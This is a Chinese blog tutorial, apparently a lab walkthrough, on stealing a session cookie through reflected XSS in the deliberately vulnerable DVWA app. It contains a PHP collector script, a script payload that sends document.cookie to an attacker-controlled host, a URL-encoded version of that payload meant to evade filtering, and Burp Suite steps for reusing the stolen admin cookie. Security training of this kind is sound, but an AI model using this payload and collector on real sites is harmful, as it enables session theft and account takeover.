1.1 窃取用户cookie信息保存到远程服务器
1.1.1 构建钓鱼网站接收cookie
页面中创建cookie变量,然后将cookie变量写入cookie.txt
# vim /var/www/html/diaoyu.php <?php $cookie=$_GET['cookie']; file_put_contents('cookie.txt',$cookie); ?> # touch cookie.txt # chown www-data.www-data cookie.txt # systemctl start apache2.service
1.1.2 构建URL
1.1.2.1 构建payload
<script>document.location='http://192.168.10.180/diaoyu.php?cookie='+document.cookie</script>
payload说明:
- location:用于跳转页面
- http://192.168.10.180/diaoyu.php’?cookie=’+document.cookie:传递cookie参数到php
1.1.2.2 完整URL
http://192.168.10.159/DVWA/vulnerabilities/xss_r/?name=<script>document.location='http://192.168.10.180/diaoyu.php?cookie='+document.cookie</script>
但是因为url中直接有”js脚本”,有时服务器会拒绝,导致访问不成功,所以我们使用burpsuite对payload进行URL加密:
替换后的URL是:
http://192.168.10.159/DVWA/vulnerabilities/xss_r/?name=%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%30%2e%31%38%30%2f%64%69%61%6f%79%75%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
注意:这个加密链接想直接访问必须提前登录DVWA,否则浏览器没有cookie信息会无法获取cookie。
1.1.3 在物理机上执行攻击
1.1.3.1 登录admin用户并修改安全级别
1.1.3.2 直接使用URL访问
访问后会自动跳转到钓鱼网站
1.1.4 查看获取到的cookie信息
┌──(root?kali)-[/var/www/html] └─# cat cookie.txt PHPSESSID=re1bikctb5qftocp0fqus1qos0; security=low
1.1.5 使用获取到的cookie提权
1.1.5.1 开启burpsuite拦截
1.1.5.2 使用普通用户登录DVWA
DVWA中内置了一些其他用户,这里我们使用用户名:smithy密码:password登录DVWA。
放行第一个请求,因为该请求携带用户名和密码:
1.1.5.3 进行cookie替换并提权
将存在Cookie信息的请求发送到Repeater进行重放攻击,将现在的普通用户的cookie信息替换成前期抓到的admin cookie信息:PHPSESSID= re1bikctb5qftocp0fqus1qos0; security=low
点击Send返回状态码200表示成功。
1.1.5.4 浏览器查看提权成功
浏览器中访问:
成功切换为admin用户。
温馨提示:本文最后更新于
转载请注明本文链接:https://blog.leonshadow.cn/763482/2655.html
2022-12-20 20:57:35
,已超过492
天没有更新。某些文章具有时效性,若文章内容或图片资源有错误或已失效,请联系站长。谢谢!转载请注明本文链接:https://blog.leonshadow.cn/763482/2655.html
© 版权声明
THE END